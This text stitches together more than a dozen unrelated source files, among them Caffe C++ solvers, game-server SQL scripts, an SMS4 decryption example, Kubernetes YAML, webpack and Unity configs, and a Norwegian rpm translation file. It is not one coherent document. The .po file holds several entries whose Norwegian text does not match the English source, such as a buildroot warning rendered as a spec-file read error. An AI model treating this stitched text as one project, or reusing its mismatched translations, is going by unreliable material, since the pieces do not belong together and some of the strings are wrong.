INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,0,0,0,100,2,7000,7000,15000,15000,11,18812,0,0,0,0,0,2,0,0,0,0,0,0,0, 'Spectral Stable Hand - Combat - Cast Knockdown'),
(@ENTRY,0,1,0,0,0,100,2,4000,4000,45000,45000,11,6016,0,0,0,0,0,2,0,0,0,0,0,0,0, 'Spectral Stable Hand - Combat - Cast Pierce Armor'),
(@ENTRY,0,2,3,14,0,100,3,38400,40,60000,60000,11,29339,0,0,0,0,0,7,0,0,0,0,0,0,0, 'Spectral Stable Hand - Combat - Cast Healing Touch on Ally'),
(@ENTRY,0,3,0,61,0,100,0,0,0,0,0,11,29340,0,0,0,0,0,7,0,0,0,0,0,0,0, 'Spectral Stable Hand - Combat - Cast Whip Frenzy on Ally'),
(@ENTRY,0,4,0,6,0,100,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Spectral Stable Hand - On Death - Say text');
-- NPC talk text convert from creature_ai_text
-- DELETE FROM `creature_ai_texts` WHERE `entry` IN (-40,-41);
DELETE FROM `creature_text` WHERE `entry` IN (15551);
INSERT INTO `creature_text` (`entry`,`groupid`,`id`,`text`,`type`,`language`,`probability`,`emote`,`duration`,`sound`,`comment`) VALUES
(15551,0,0, 'Is this the end?',14,0,100,0,0,0, 'Spectral Stable Hand - On Death Say'),
(15551,0,1, 'What will become of...',12,0,100,0,0,0, 'Spectral Stable Hand - On Death Say');
| {
"pile_set_name": "Github"
} |
#ifndef CAFFE_SGD_SOLVERS_HPP_
#define CAFFE_SGD_SOLVERS_HPP_
#include <string>
#include <vector>
#include "caffe/solver.hpp"
namespace caffe {
/**
* @brief Optimizes the parameters of a Net using
* stochastic gradient descent (SGD) with momentum.
*/
template <typename Dtype>
class SGDSolver : public Solver<Dtype> {
public:
explicit SGDSolver(const SolverParameter& param)
: Solver<Dtype>(param) { PreSolve(); }
explicit SGDSolver(const string& param_file)
: Solver<Dtype>(param_file) { PreSolve(); }
virtual inline const char* type() const { return "SGD"; }
const vector<shared_ptr<Blob<Dtype> > >& history() { return history_; }
protected:
void PreSolve();
Dtype GetLearningRate();
virtual void ApplyUpdate();
virtual void Normalize(int param_id);
virtual void Regularize(int param_id);
virtual void ComputeUpdateValue(int param_id, Dtype rate);
virtual void ClipGradients();
virtual void SnapshotSolverState(const string& model_filename);
virtual void SnapshotSolverStateToBinaryProto(const string& model_filename);
virtual void SnapshotSolverStateToHDF5(const string& model_filename);
virtual void RestoreSolverStateFromHDF5(const string& state_file);
virtual void RestoreSolverStateFromBinaryProto(const string& state_file);
// history maintains the historical momentum data.
// update maintains update related data and is not needed in snapshots.
// temp maintains other information that might be needed in computation
// of gradients/updates and is not needed in snapshots
vector<shared_ptr<Blob<Dtype> > > history_, update_, temp_;
DISABLE_COPY_AND_ASSIGN(SGDSolver);
};
template <typename Dtype>
class NesterovSolver : public SGDSolver<Dtype> {
public:
explicit NesterovSolver(const SolverParameter& param)
: SGDSolver<Dtype>(param) {}
explicit NesterovSolver(const string& param_file)
: SGDSolver<Dtype>(param_file) {}
virtual inline const char* type() const { return "Nesterov"; }
protected:
virtual void ComputeUpdateValue(int param_id, Dtype rate);
DISABLE_COPY_AND_ASSIGN(NesterovSolver);
};
template <typename Dtype>
class AdaGradSolver : public SGDSolver<Dtype> {
public:
explicit AdaGradSolver(const SolverParameter& param)
: SGDSolver<Dtype>(param) { constructor_sanity_check(); }
explicit AdaGradSolver(const string& param_file)
: SGDSolver<Dtype>(param_file) { constructor_sanity_check(); }
virtual inline const char* type() const { return "AdaGrad"; }
protected:
virtual void ComputeUpdateValue(int param_id, Dtype rate);
void constructor_sanity_check() {
CHECK_EQ(0, this->param_.momentum())
<< "Momentum cannot be used with AdaGrad.";
}
DISABLE_COPY_AND_ASSIGN(AdaGradSolver);
};
template <typename Dtype>
class RMSPropSolver : public SGDSolver<Dtype> {
public:
explicit RMSPropSolver(const SolverParameter& param)
: SGDSolver<Dtype>(param) { constructor_sanity_check(); }
explicit RMSPropSolver(const string& param_file)
: SGDSolver<Dtype>(param_file) { constructor_sanity_check(); }
virtual inline const char* type() const { return "RMSProp"; }
protected:
virtual void ComputeUpdateValue(int param_id, Dtype rate);
void constructor_sanity_check() {
CHECK_EQ(0, this->param_.momentum())
<< "Momentum cannot be used with RMSProp.";
CHECK_GE(this->param_.rms_decay(), 0)
<< "rms_decay should lie between 0 and 1.";
CHECK_LT(this->param_.rms_decay(), 1)
<< "rms_decay should lie between 0 and 1.";
}
DISABLE_COPY_AND_ASSIGN(RMSPropSolver);
};
template <typename Dtype>
class AdaDeltaSolver : public SGDSolver<Dtype> {
public:
explicit AdaDeltaSolver(const SolverParameter& param)
: SGDSolver<Dtype>(param) { AdaDeltaPreSolve(); }
explicit AdaDeltaSolver(const string& param_file)
: SGDSolver<Dtype>(param_file) { AdaDeltaPreSolve(); }
virtual inline const char* type() const { return "AdaDelta"; }
protected:
void AdaDeltaPreSolve();
virtual void ComputeUpdateValue(int param_id, Dtype rate);
DISABLE_COPY_AND_ASSIGN(AdaDeltaSolver);
};
/**
* @brief AdamSolver, an algorithm for first-order gradient-based optimization
* of stochastic objective functions, based on adaptive estimates of
* lower-order moments. Described in [1].
*
* [1] D. P. Kingma and J. L. Ba, "ADAM: A Method for Stochastic Optimization."
* arXiv preprint arXiv:1412.6980v8 (2014).
*/
template <typename Dtype>
class AdamSolver : public SGDSolver<Dtype> {
public:
explicit AdamSolver(const SolverParameter& param)
: SGDSolver<Dtype>(param) { AdamPreSolve();}
explicit AdamSolver(const string& param_file)
: SGDSolver<Dtype>(param_file) { AdamPreSolve(); }
virtual inline const char* type() const { return "Adam"; }
protected:
void AdamPreSolve();
virtual void ComputeUpdateValue(int param_id, Dtype rate);
DISABLE_COPY_AND_ASSIGN(AdamSolver);
};
} // namespace caffe
#endif // CAFFE_SGD_SOLVERS_HPP_
| {
"pile_set_name": "Github"
} |
; RUN: llc < %s
; PR4975
%0 = type <{ [0 x i32] }>
%union.T0 = type { }
@.str = private constant [1 x i8] c" "
define void @t(%0) nounwind {
entry:
%arg0 = alloca %union.T0
%1 = bitcast %union.T0* %arg0 to %0*
store %0 %0, %0* %1, align 1
ret void
}
declare i32 @printf(i8*, ...)
| {
"pile_set_name": "Github"
} |
#include <algorithm>
#include <cfloat>
#include <vector>
#include "caffe/layers/softmax_loss_layer.hpp"
#include "caffe/util/math_functions.hpp"
namespace caffe {
template <typename Dtype>
void SoftmaxWithLossLayer<Dtype>::LayerSetUp(
const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {
LossLayer<Dtype>::LayerSetUp(bottom, top);
LayerParameter softmax_param(this->layer_param_);
softmax_param.set_type("Softmax");
softmax_layer_ = LayerRegistry<Dtype>::CreateLayer(softmax_param);
softmax_bottom_vec_.clear();
softmax_bottom_vec_.push_back(bottom[0]);
softmax_top_vec_.clear();
softmax_top_vec_.push_back(&prob_);
softmax_layer_->SetUp(softmax_bottom_vec_, softmax_top_vec_);
has_ignore_label_ =
this->layer_param_.loss_param().has_ignore_label();
if (has_ignore_label_) {
ignore_label_ = this->layer_param_.loss_param().ignore_label();
}
if (!this->layer_param_.loss_param().has_normalization() &&
this->layer_param_.loss_param().has_normalize()) {
normalization_ = this->layer_param_.loss_param().normalize() ?
LossParameter_NormalizationMode_VALID :
LossParameter_NormalizationMode_BATCH_SIZE;
} else {
normalization_ = this->layer_param_.loss_param().normalization();
}
}
template <typename Dtype>
void SoftmaxWithLossLayer<Dtype>::Reshape(
const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {
LossLayer<Dtype>::Reshape(bottom, top);
softmax_layer_->Reshape(softmax_bottom_vec_, softmax_top_vec_);
softmax_axis_ =
bottom[0]->CanonicalAxisIndex(this->layer_param_.softmax_param().axis());
outer_num_ = bottom[0]->count(0, softmax_axis_);
inner_num_ = bottom[0]->count(softmax_axis_ + 1);
CHECK_EQ(outer_num_ * inner_num_, bottom[1]->count())
<< "Number of labels must match number of predictions; "
<< "e.g., if softmax axis == 1 and prediction shape is (N, C, H, W), "
<< "label count (number of labels) must be N*H*W, "
<< "with integer values in {0, 1, ..., C-1}.";
if (top.size() >= 2) {
// softmax output
top[1]->ReshapeLike(*bottom[0]);
}
}
template <typename Dtype>
void SoftmaxWithLossLayer<Dtype>::Forward_cpu(
const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {
// The forward pass computes the softmax prob values.
softmax_layer_->Forward(softmax_bottom_vec_, softmax_top_vec_);
const Dtype* prob_data = prob_.cpu_data();
const Dtype* label = bottom[1]->cpu_data();
int dim = prob_.count() / outer_num_;
int count = 0;
Dtype loss = 0;
for (int i = 0; i < outer_num_; ++i) {
for (int j = 0; j < inner_num_; j++) {
const int label_value = static_cast<int>(label[i * inner_num_ + j]);
if (has_ignore_label_ && label_value == ignore_label_) {
continue;
}
DCHECK_GE(label_value, 0);
DCHECK_LT(label_value, prob_.shape(softmax_axis_));
loss -= log(std::max(prob_data[i * dim + label_value * inner_num_ + j],
Dtype(FLT_MIN)));
++count;
}
}
Dtype normalizer = LossLayer<Dtype>::GetNormalizer(
normalization_, outer_num_, inner_num_, count);
top[0]->mutable_cpu_data()[0] = loss / normalizer;
if (top.size() == 2) {
top[1]->ShareData(prob_);
}
}
template <typename Dtype>
void SoftmaxWithLossLayer<Dtype>::Backward_cpu(const vector<Blob<Dtype>*>& top,
const vector<bool>& propagate_down, const vector<Blob<Dtype>*>& bottom) {
if (propagate_down[1]) {
LOG(FATAL) << this->type()
<< " Layer cannot backpropagate to label inputs.";
}
if (propagate_down[0]) {
Dtype* bottom_diff = bottom[0]->mutable_cpu_diff();
const Dtype* prob_data = prob_.cpu_data();
caffe_copy(prob_.count(), prob_data, bottom_diff);
const Dtype* label = bottom[1]->cpu_data();
int dim = prob_.count() / outer_num_;
int count = 0;
for (int i = 0; i < outer_num_; ++i) {
for (int j = 0; j < inner_num_; ++j) {
const int label_value = static_cast<int>(label[i * inner_num_ + j]);
if (has_ignore_label_ && label_value == ignore_label_) {
for (int c = 0; c < bottom[0]->shape(softmax_axis_); ++c) {
bottom_diff[i * dim + c * inner_num_ + j] = 0;
}
} else {
bottom_diff[i * dim + label_value * inner_num_ + j] -= 1;
++count;
}
}
}
// Scale gradient
Dtype normalizer = LossLayer<Dtype>::GetNormalizer(
normalization_, outer_num_, inner_num_, count);
Dtype loss_weight = top[0]->cpu_diff()[0] / normalizer;
caffe_scal(prob_.count(), loss_weight, bottom_diff);
}
}
#ifdef CPU_ONLY
STUB_GPU(SoftmaxWithLossLayer);
#endif
INSTANTIATE_CLASS(SoftmaxWithLossLayer);
REGISTER_LAYER_CLASS(SoftmaxWithLoss);
} // namespace caffe
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright 2020 Intel Corporation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*******************************************************************************/
/*!
*
* \file
*
* \brief SMS4 Cipher Block Chaining mode of operation (CBC) example
*
* This example demonstrates usage of SMS4 block cipher
* run with CBC mode of operation. Decryption scheme.
*
* The CBC mode of operation is implemented according to the
* "NIST Special Publication 800-38A: Recommendation for Block Cipher Modes of
* Operation" document:
*
* https://csrc.nist.gov/publications/detail/sp/800-38a/final
*
*/
#include <string.h>
#include "ippcp.h"
#include "examples_common.h"
/*! SMS4 block size in bytes */
static const int SMS4_BLOCK_SIZE = 16;
/*! Key size in bytes */
static const int KEY_SIZE = 16;
/*! Message size in bytes */
static const int SRC_LEN = 16;
/*! Plain text */
static Ipp8u plainText[SRC_LEN] = {
0xAA,0xAA,0xAA,0xAA,0xBB,0xBB,0xBB,0xBB,
0xCC,0xCC,0xCC,0xCC,0xDD,0xDD,0xDD,0xDD
};
/*! Cipher text */
static Ipp8u cipherText[SRC_LEN] = {
0x78,0xEB,0xB1,0x1C,0xC4,0x0B,0x0A,0x48,
0x31,0x2A,0xAE,0xB2,0x04,0x02,0x44,0xCB
};
/*! 128-bit secret key */
static Ipp8u key[KEY_SIZE] = {
0x01,0x23,0x45,0x67,0x89,0xAB,0xCD,0xEF,
0xFE,0xDC,0xBA,0x98,0x76,0x54,0x32,0x10
};
/*! Initialization vector for CBC mode.
* Size of initialization vector for SMS4-CBC shall be equal to the size of SMS4 block (16 bytes).
*/
static Ipp8u iv[SMS4_BLOCK_SIZE] = {
0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,
0x08,0x09,0x0A,0x0B,0x0C,0x0D,0x0E,0x0F
};
/*! Main function */
int main(void)
{
/* Size of SMS4 context structure. It will be set up in ippsSMS4GetSize(). */
int ctxSize = 0;
Ipp8u pOut[SRC_LEN] = {};
/* Internal function status */
IppStatus status = ippStsNoErr;
/* Pointer to SMS4 context structure */
IppsSMS4Spec* pSMS4 = 0;
do {
/* 1. Get size needed for SMS4 context structure */
status = ippsSMS4GetSize(&ctxSize);
if (!checkStatus("ippsSMS4GetSize", ippStsNoErr, status))
return status;
/* 2. Allocate memory for SMS4 context structure */
pSMS4 = (IppsSMS4Spec*)(new Ipp8u[ctxSize]);
if (NULL == pSMS4) {
printf("ERROR: Cannot allocate memory (%d bytes) for SMS4 context\n", ctxSize);
return -1;
}
/* 3. Initialize SMS4 context */
status = ippsSMS4Init(key, sizeof(key), pSMS4, ctxSize);
if (!checkStatus("ippsSMS4Init", ippStsNoErr, status))
break;
/* 4. Decryption */
status = ippsSMS4DecryptCBC(cipherText, pOut, sizeof(cipherText), pSMS4, iv);
if (!checkStatus("ippsSMS4DecryptCBC", ippStsNoErr, status))
break;
/* Compare decrypted message and reference text */
if (0 != memcmp(pOut, plainText, sizeof(plainText))) {
printf("ERROR: Decrypted and reference messages do not match\n");
break;
}
} while (0);
/* 5. Remove secret and release resources */
ippsSMS4Init(0, KEY_SIZE, pSMS4, ctxSize);
if (pSMS4) delete [] (Ipp8u*)pSMS4;
PRINT_EXAMPLE_STATUS("ippsSMS4DecryptCBC", "SMS4-CBC Decryption", !status)
return status;
}
| {
"pile_set_name": "Github"
} |
<?php
/**
* View: Top Bar Navigation Previous Template
*
* Override this template in your own theme by creating a file at:
* [your-theme]/tribe/events/v2/day/top-bar/nav/prev.php
*
* See more documentation about our views templating system.
*
* @link http://m.tri.be/1aiy
*
* @var string $prev_url The URL to the previous page, if any, or an empty string.
*
* @version 5.0.1
*
*/
?>
<li class="tribe-events-c-top-bar__nav-list-item">
<a
href="<?php echo esc_url( $prev_url ); ?>"
class="tribe-common-c-btn-icon tribe-common-c-btn-icon--caret-left tribe-events-c-top-bar__nav-link tribe-events-c-top-bar__nav-link--prev"
aria-label="<?php esc_attr_e( 'Previous day', 'the-events-calendar' ); ?>"
title="<?php esc_attr_e( 'Previous day', 'the-events-calendar' ); ?>"
data-js="tribe-events-view-link"
>
</a>
</li>
| {
"pile_set_name": "Github"
} |
---
apiVersion: v1
kind: ReplicationController
metadata:
name: show-rc
labels:
type: show-type
spec:
replicas: 3
template:
metadata:
labels:
type: show-type
spec:
containers:
- name: show-container
image: gcr.io/google-samples/env-show:1.1
imagePullPolicy: Always
ports:
- containerPort: 8080
protocol: TCP
env:
- name: USER_VAR
value: important information
- name: POD_NAME
valueFrom:
fieldRef:
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
| {
"pile_set_name": "Github"
} |
var path = require('path')
var utils = require('./utils')
var config = require('../config')
var vueLoaderConfig = require('./vue-loader.conf')
function resolve (dir) {
return path.join(__dirname, '..', dir)
}
module.exports = {
entry: {
app: './src/main.js'
},
output: {
path: config.build.assetsRoot,
filename: '[name].js',
publicPath: process.env.NODE_ENV === 'production'
? config.build.assetsPublicPath
: config.dev.assetsPublicPath
},
resolve: {
extensions: ['.js', '.vue', '.json'],
alias: {
'vue$': 'vue/dist/vue.esm.js',
'@': resolve('src'),
}
},
module: {
rules: [
{
test: /\.vue$/,
loader: 'vue-loader',
options: vueLoaderConfig
},
{
test: /\.js$/,
loader: 'babel-loader',
include: [resolve('src'), resolve('test')]
},
{
test: /\.(png|jpe?g|gif|svg)(\?.*)?$/,
loader: 'url-loader',
query: {
limit: 10000,
name: utils.assetsPath('img/[name].[hash:7].[ext]')
}
},
{
test: /\.(woff2?|eot|ttf|otf)(\?.*)?$/,
loader: 'url-loader',
query: {
limit: 10000,
name: utils.assetsPath('fonts/[name].[hash:7].[ext]')
}
}
]
}
}
| {
"pile_set_name": "Github"
} |
.*
| {
"pile_set_name": "Github"
} |
resource "google_monitoring_notification_channel" "<%= ctx[:primary_resource_id] %>" {
display_name = "<%= ctx[:vars]["display_name"] %>"
type = "email"
labels = {
email_address = "[email protected]"
}
}
| {
"pile_set_name": "Github"
} |
a_global = "A global var"
def foo():
print("foo")
def func_foo():
a_local = "A local var"
return a_local + a_global
class outer_class():
class inner_class:
@staticmethod
def func_bar():
a_local = "A local var"
return a_local + a_global
| {
"pile_set_name": "Github"
} |
import React from 'react';
import Head from 'next/head';
import PropTypes from 'prop-types';
import 'antd/dist/antd.css';
import wrapper from '../store/configureStore';
const NodeBird = ({ Component }) => {
return (
<>
<Head>
<title>NodeBird</title>
</Head>
<Component />
</>
);
};
NodeBird.propTypes = {
Component: PropTypes.elementType.isRequired,
};
export default wrapper.withRedux(NodeBird);
| {
"pile_set_name": "Github"
} |
package org.zalando.riptide;
import org.apiguardian.api.API;
import java.util.function.Supplier;
import static com.google.common.base.Suppliers.memoize;
import static com.google.common.collect.ObjectArrays.concat;
import static org.apiguardian.api.API.Status.STABLE;
import static org.zalando.fauxpas.FauxPas.partially;
/**
* Preserves the original stack traces of failed requests. Requests in Riptide are executed asynchronously by default.
* That has the unfortunate side-effect that stack traces from exceptions that happen when processing the response will
* not contain everything that is needed to trace back to the caller.
* <p>
* This plugin will modify the stack trace of any thrown exception and appending the stack trace elements of the
* original stack trace
*/
@API(status = STABLE)
public final class OriginalStackTracePlugin implements Plugin {
/**
* {@link Attribute} that allows to access the original stack trace, i.e. the stack trace from the calling thread.
*/
public static final Attribute<Supplier<StackTraceElement[]>> STACK = Attribute.generate();
@Override
public RequestExecution aroundAsync(final RequestExecution execution) {
return arguments -> {
final Supplier<StackTraceElement[]> original = keepOriginalStackTrace();
return execution.execute(arguments.withAttribute(STACK, original))
.exceptionally(partially(cause -> {
cause.setStackTrace(join(cause, original.get()));
throw cause;
}));
};
}
private StackTraceElement[] join(final Throwable throwable, final StackTraceElement[] original) {
return concat(throwable.getStackTrace(), original, StackTraceElement.class);
}
/**
* A good way to store a stacktrace away efficiently is to simply construct an exception. Later, if you
* want to inspect the stacktrace call exception.getStackTrace() which will do the slow work of
* resolving the stack frames to methods.
* <p>
* <a href="http://stackoverflow.com/a/4377609/232539>What is the proper way to keep track of the original stack trace in a newly created Thread?</a>
*/
@SuppressWarnings("ThrowableInstanceNeverThrown")
private Supplier<StackTraceElement[]> keepOriginalStackTrace() {
return memoize(new Exception()::getStackTrace);
}
}
| {
"pile_set_name": "Github"
} |
//
// GTRepository+Blame.h
// ObjectiveGitFramework
//
// Created by Ezekiel Pierson on 2/5/14.
// Copyright (c) 2014 GitHub, Inc. All rights reserved.
//
#import <Foundation/Foundation.h>
#import "GTRepository.h"
#import "git2/blame.h"
@class GTBlame;
/// Enum for options passed to the dictionary in `-blameWithFile:inRepository:options:`
///
/// For flag documentation see `blame.h`.
typedef NS_OPTIONS(NSInteger, GTBlameOptions) {
GTBlameOptionsNormal = GIT_BLAME_NORMAL,
};
/// A `NSNumber` wrapped `GTBlameOptions`. Flags are documented above.
extern NSString * const GTBlameOptionsFlags;
/// A `GTOID` determining the newest commit to consider.
/// Default is HEAD.
extern NSString * const GTBlameOptionsNewestCommitOID;
/// A `GTOID` determining the oldest commit to consider.
/// Default is the first commit without a parent.
extern NSString * const GTBlameOptionsOldestCommitOID;
/// The first line in the file to blame. Default is 1.
extern NSString * const GTBlameOptionsFirstLine;
/// The last line in the file to blame. Default is the last line.
extern NSString * const GTBlameOptionsLastLine;
@interface GTRepository (Blame)
/// Create a blame for a file, with options.
///
/// path - Path for the file to examine. Can't be nil
/// options - A dictionary consiting of the above keys. May be nil.
/// error - Populated with an `NSError` object on error.
///
/// Returns a new `GTBlame` object or nil if an error occurred.
- (GTBlame *)blameWithFile:(NSString *)path options:(NSDictionary *)options error:(NSError **)error;
@end
| {
"pile_set_name": "Github"
} |
%YAML 1.1
%TAG !u! tag:unity3d.com,2011:
--- !u!30 &1
GraphicsSettings:
m_ObjectHideFlags: 0
serializedVersion: 12
m_Deferred:
m_Mode: 1
m_Shader: {fileID: 69, guid: 0000000000000000f000000000000000, type: 0}
m_DeferredReflections:
m_Mode: 1
m_Shader: {fileID: 74, guid: 0000000000000000f000000000000000, type: 0}
m_ScreenSpaceShadows:
m_Mode: 1
m_Shader: {fileID: 64, guid: 0000000000000000f000000000000000, type: 0}
m_LegacyDeferred:
m_Mode: 1
m_Shader: {fileID: 63, guid: 0000000000000000f000000000000000, type: 0}
m_DepthNormals:
m_Mode: 1
m_Shader: {fileID: 62, guid: 0000000000000000f000000000000000, type: 0}
m_MotionVectors:
m_Mode: 1
m_Shader: {fileID: 75, guid: 0000000000000000f000000000000000, type: 0}
m_LightHalo:
m_Mode: 1
m_Shader: {fileID: 105, guid: 0000000000000000f000000000000000, type: 0}
m_LensFlare:
m_Mode: 1
m_Shader: {fileID: 102, guid: 0000000000000000f000000000000000, type: 0}
m_AlwaysIncludedShaders:
- {fileID: 7, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 15104, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 15105, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 15106, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 10753, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 10770, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 16000, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 17000, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 16002, guid: 0000000000000000f000000000000000, type: 0}
m_PreloadedShaders: []
m_SpritesDefaultMaterial: {fileID: 10754, guid: 0000000000000000f000000000000000,
type: 0}
m_CustomRenderPipeline: {fileID: 0}
m_TransparencySortMode: 0
m_TransparencySortAxis: {x: 0, y: 0, z: 1}
m_DefaultRenderingPath: 1
m_DefaultMobileRenderingPath: 1
m_TierSettings: []
m_LightmapStripping: 0
m_FogStripping: 0
m_InstancingStripping: 0
m_LightmapKeepPlain: 1
m_LightmapKeepDirCombined: 1
m_LightmapKeepDynamicPlain: 1
m_LightmapKeepDynamicDirCombined: 1
m_LightmapKeepShadowMask: 1
m_LightmapKeepSubtractive: 1
m_FogKeepLinear: 1
m_FogKeepExp: 1
m_FogKeepExp2: 1
m_AlbedoSwatchInfos: []
m_LightsUseLinearIntensity: 0
m_LightsUseColorTemperature: 0
m_LogWhenShaderIsCompiled: 0
| {
"pile_set_name": "Github"
} |
# SOME DESCRIPTIVE TITLE.
# Copyright (C) YEAR Free Software Foundation, Inc.
# This file is distributed under the same license as the PACKAGE package.
#
# Translators:
msgid ""
msgstr ""
"Project-Id-Version: PACKAGE VERSION\n"
"Report-Msgid-Bugs-To: [email protected]\n"
"POT-Creation-Date: 2020-08-20 13:58+0300\n"
"PO-Revision-Date: 2020-03-23 08:39-0400\n"
"Last-Translator: Copied by Zanata <[email protected]>\n"
"Language-Team: Norwegian Bokmål (http://www.transifex.com/rpm-team/rpm/"
"language/nb/)\n"
"Language: nb\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"Plural-Forms: nplurals=2; plural=(n != 1);\n"
"X-Generator: Zanata 4.6.2\n"
#, c-format
msgid "%s: %s\n"
msgstr "%s: %s\n"
#, c-format
msgid "RPM version %s\n"
msgstr "RPM versjon %s\n"
#, c-format
msgid "Copyright (C) 1998-2002 - Red Hat, Inc.\n"
msgstr ""
#, c-format
msgid ""
"This program may be freely redistributed under the terms of the GNU GPL\n"
msgstr ""
#, c-format
msgid "creating a pipe for --pipe failed: %m\n"
msgstr ""
#, c-format
msgid "exec failed\n"
msgstr "kjøring feilet\n"
#, c-format
msgid "argument is not an RPM package\n"
msgstr "argumentet er ikke en RPM-pakke\n"
#, c-format
msgid "error reading header from package\n"
msgstr "feil under lesing av header fra pakke\n"
#, c-format
msgid "cannot re-open payload: %s\n"
msgstr "kan ikke gjenåpne \"payload\": %s\n"
#, c-format
msgid "files over 4GB not supported by cpio, use rpm2archive instead\n"
msgstr ""
#, c-format
msgid "buildroot already specified, ignoring %s\n"
msgstr "Feil under lesing av spec fil fra %s\n"
#, c-format
msgid "build through %prep (unpack sources and apply patches) from <specfile>"
msgstr ""
"bygg gjennom %prep (pakk ut kildekoden og legg til patcher) fra <specfil>"
msgid "<specfile>"
msgstr "<specfil>"
msgid "build through %build (%prep, then compile) from <specfile>"
msgstr ""
msgid "build through %install (%prep, %build, then install) from <specfile>"
msgstr ""
#, c-format
msgid "verify %files section from <specfile>"
msgstr ""
msgid "build source and binary packages from <specfile>"
msgstr "bygg kilde- og binærpakker fra <specfil>"
msgid "build binary package only from <specfile>"
msgstr "spør pakke som eier <fil>"
msgid "build source package only from <specfile>"
msgstr ""
msgid ""
"build source package only from <specfile> - calculate dynamic build requires"
msgstr ""
#, c-format
msgid ""
"build through %prep (unpack sources and apply patches) from <source package>"
msgstr ""
msgid "<source package>"
msgstr "<kildepakke>"
msgid "build through %build (%prep, then compile) from <source package>"
msgstr ""
msgid ""
"build through %install (%prep, %build, then install) from <source package>"
msgstr ""
#, c-format
msgid "verify %files section from <source package>"
msgstr ""
msgid "build source and binary packages from <source package>"
msgstr ""
msgid "build binary package only from <source package>"
msgstr ""
msgid "build source package only from <source package>"
msgstr ""
msgid ""
"build source package only from <source package> - calculate dynamic build "
"requires"
msgstr ""
#, c-format
msgid "build through %prep (unpack sources and apply patches) from <tarball>"
msgstr ""
"bygg gjennom %prep (pakk ut kildekoden og legg til patcher) fra <tarball>"
msgid "<tarball>"
msgstr "<tarball>"
msgid "build through %build (%prep, then compile) from <tarball>"
msgstr ""
msgid "build through %install (%prep, %build, then install) from <tarball>"
msgstr ""
#, c-format
msgid "verify %files section from <tarball>"
msgstr "verifiser %files seksjon fra <tarball>"
msgid "build source and binary packages from <tarball>"
msgstr "bygg kilde- og binærpakker fra <tarball>"
msgid "build binary package only from <tarball>"
msgstr ""
msgid "build source package only from <tarball>"
msgstr ""
msgid ""
"build source package only from <tarball> - calculate dynamic build requires"
msgstr ""
msgid "build binary package from <source package>"
msgstr "bygg binær-pakke fra <kildepakke>"
msgid "override build root"
msgstr ""
msgid "run build in current directory"
msgstr ""
msgid "remove build tree when done"
msgstr "fjern byggtreet når ferdig"
msgid "ignore ExcludeArch: directives from spec file"
msgstr ""
msgid "debug file state machine"
msgstr ""
msgid "do not execute any stages of the build"
msgstr ""
msgid "do not verify build dependencies"
msgstr ""
msgid "generate package header(s) compatible with (legacy) rpm v3 packaging"
msgstr ""
#, c-format
msgid "do not execute %clean stage of the build"
msgstr ""
#, c-format
msgid "do not execute %prep stage of the build"
msgstr ""
#, c-format
msgid "do not execute %check stage of the build"
msgstr ""
msgid "do not accept i18N msgstr's from specfile"
msgstr ""
msgid "remove sources when done"
msgstr "fjern kildekoden når ferdig"
msgid "remove specfile when done"
msgstr ""
msgid "skip straight to specified stage (only for c,i)"
msgstr "hopp rett til spesifisert steg (kun for c,i)"
msgid "override target platform"
msgstr ""
msgid "Build options with [ <specfile> | <tarball> | <source package> ]:"
msgstr ""
msgid "Common options for all rpm modes and executables:"
msgstr ""
#, c-format
msgid "Unable to open spec file %s: %s\n"
msgstr "Kunne ikke åpne spec fil %s: %s\n"
#, c-format
msgid "Failed to open tar pipe: %m\n"
msgstr "Kunne ikke åpne tar-rør: %m\n"
#, c-format
msgid "Found more than one spec file in %s\n"
msgstr ""
#, c-format
msgid "Failed to read spec file from %s\n"
msgstr "Feil under lesing av spec-fil fra %s\n"
#, c-format
msgid "failed to stat %s: %m\n"
msgstr "kunne ikke kjøre stat på %s: %m\n"
#, c-format
msgid "File %s is not a regular file.\n"
msgstr "Fil %s er ikke en vanlig fil.\n"
#, c-format
msgid "File %s does not appear to be a specfile.\n"
msgstr "Fil %s ser ikke ut til å være en spec-fil.\n"
#, c-format
msgid "Building target platforms: %s\n"
msgstr "Bygger målplattformene: %s\n"
#, c-format
msgid "Building for target %s\n"
msgstr "Bygger for mål %s\n"
msgid "arguments to --root (-r) must begin with a /"
msgstr ""
msgid "initialize database"
msgstr "initier database"
msgid "rebuild database inverted lists from installed package headers"
msgstr "gjenoppbygg database inverterte lister fra installerte pakkers headere"
msgid "verify database files"
msgstr ""
#, fuzzy
msgid "salvage database"
msgstr "initier database"
msgid "export database to stdout header list"
msgstr ""
msgid "import database from stdin header list"
msgstr ""
msgid "Database options:"
msgstr ""
msgid "only one major mode may be specified"
msgstr "kun ett større modi kan spesifiseres"
msgid "verify package signature(s)"
msgstr ""
